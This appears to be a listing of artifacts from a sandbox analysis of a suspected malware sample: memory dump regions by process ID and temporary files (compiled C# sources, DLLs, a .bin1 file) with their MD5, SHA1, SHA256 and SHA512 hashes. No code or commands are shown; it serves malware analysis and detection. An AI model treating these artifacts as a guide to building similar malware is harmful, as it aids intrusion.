memory/3396-130-0x0000000000000000-mapping.dmp

memory/3396-131-0x0000000010000000-0x000000001000E000-memory.dmp

memory/3396-136-0x00000000024B0000-0x00000000024BD000-memory.dmp

memory/368-140-0x0000000000000000-mapping.dmp

memory/368-141-0x000002B7F1AE0000-0x000002B7F1B02000-memory.dmp

memory/368-142-0x00007FFFDE2C0000-0x00007FFFDED81000-memory.dmp

memory/4084-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline

MD5 6e643d9fe9f1aac860a49e946a8c1232
SHA1 c7d2d4618b3995fe915769ad5af4db5f16e20b49
SHA256 b576b3445b689a1f91fd59405021e742167b6d8b89b57e23f06c1191b2ebca4f
SHA512 0a620b6ea4ff2ea42849ce5faf70d0178acd87acad39fddfe5ea025374897ad72ab732e1b6e4cd01e7e70ce7d0cccdd32fb5d177a5659c356314ffa10b4936d1

\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.0.cs

MD5 9a10482acb9e6952b96f4efc24d9d783
SHA1 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256 a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512 e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

memory/1064-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP

MD5 42ef9a91f67553f563161947d535ef3b
SHA1 aaea4d23d8ef75b0375b71dbb44e802073930522
SHA256 5b15566fc0f44fd1340273791069e308e09966dd9f90d85a4059bff524380d74
SHA512 c63eb24bae1149a90b4e4d7c82e3e1d8b92407ffd34970aca08f02a8870b63ea5654390894d9a96d60da565534c5d69f5de9bc1b4e1a1e644ddd7167d2d84eb8

C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp

MD5 2bba2d3a3f5eceaf9fd5982bb1f4ffcd
SHA1 2069afb8433594dea4bed313bca99e13a936ff86
SHA256 e5e40879b657dc1a235ab7e907e4e500745b973e7bd411d0da7fd66469dcf473
SHA512 6e1bc08b6776cd917f7e0507c6aa9d05e1db5e68ecdcc15a331963bbe243b1d0a6766cde21de0dbc279b261d66db8d434005dabe7df2ada7c689c60fff31e18e

C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.dll

MD5 81b10bf3c350962d2233c36f83b9b5cc
SHA1 9184d8b0b3bba3fd0ba487951c6e04076ac32e6b
SHA256 537fc2fb17715d732b3e178440ba4f1eceee6d19cf86124d03acddedd0284b0e
SHA512 945749003a229d9f06396f9cc22565a9eae231e2638e8f63bb53306f9b5d8558756c028115a6d183bbf64ec54b4858e44b3f8624fb4d145e4a2b12b9525e222b

memory/1228-150-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.cmdline

MD5 9ca18ab2995b73c72e7817543c0fff70
SHA1 a4721405b5572fb18f099745c2279a830e73238c
SHA256 cad1b8d2e4f37544daed6d945ccca3538cb8b737d2fe50fe76ce83316c6747ab
SHA512 48a7cdf7ccac04eeb9e76405d3c205af448373eb6d10817d3a365e3ce0530f453bf8c86611dcc3f03c8bf4ae81f3637b56c30bae4660577f3e1475e8191a0341

\??\c:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.0.cs

MD5 aca9704199c51fde14b8bf8165bc2a4c
SHA1 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256 cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512 a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

memory/4548-153-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\evo4kxhq\CSCAD08408EB8DB4D1EA4C66DC9C3D7502F.TMP

MD5 a6d74924723e76680e8eb3e419d13343
SHA1 b2e2905937d4c2f74fb0eb8ae61bedf291b6fc2e
SHA256 7e3e3ba1953bfeec758ef0450f0e999f6a9d24fec6129dc9f97853b2b962a84b
SHA512 8fcae4ebdd846237d249fa588e2dc548bb3342938037dd74d528e76ba298a13207f9265c17e78c6953f9a789bfe8c13d3ea6dbb30b2344e7c784ec207f01991c

C:\Users\Admin\AppData\Local\Temp\RESFB9B.tmp

MD5 f624c26689ff72265aa896cf3005bb01
SHA1 c9367117bba69f3fc1027b8931b6e3c57c647145
SHA256 de26947e3348391f149a7f5f86fb7b006e83a70516f79f6b0908791522697070
SHA512 82252d90f2f8539431de92e3d835b4569791b9765c7d6361a6135ac2998865a852a70e37f368e9d7f0e8bc9a14da335bdddc1c2465bfeb2be4d16709691b88eb

C:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.dll

MD5 c9d90e6b02ab7f881a79564586b2fb95
SHA1 3d3976c7a2feb10c9e03277c282c26488b7a9162
SHA256 4e6621efa5ae5f0f62af82730200001aa72f8fbd2c12cd4afa5b12965ed1e8e2
SHA512 dedde1ce90d2646562ee2de46533721440fff126ca51dd601ae3f074ac275d6aeeb6eeed072eabc0ce1894f28decac0b87696bf285050b024d3b237e0c7d5603

memory/368-157-0x000002B7F1B80000-0x000002B7F1BBD000-memory.dmp

memory/2228-159-0x00000000084D0000-0x0000000008573000-memory.dmp

memory/368-158-0x00007FFFDE2C0000-0x00007FFFDED81000-memory.dmp

memory/2028-160-0x0000000000000000-mapping.dmp

memory/4112-161-0x0000000000000000-mapping.dmp

memory/3036-162-0x0000000000000000-mapping.dmp

memory/4648-163-0x0000000000000000-mapping.dmp

memory/3408-164-0x00000212CE110000-0x00000212CE1B3000-memory.dmp

memory/3608-165-0x00000136866D0000-0x0000013686773000-memory.dmp

memory/3144-166-0x000001DEAC9D0000-0x000001DEACA73000-memory.dmp

memory/4112-168-0x0000000000DA6B20-0x0000000000DA6B24-memory.dmp

memory/4356-167-0x000002C74A9D0000-0x000002C74AA73000-memory.dmp

memory/4112-169-0x0000000000920000-0x00000000009B6000-memory.dmp

memory/4524-170-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C84E.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/4496-172-0x0000000000000000-mapping.dmp

memory/3512-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C84E.bin1
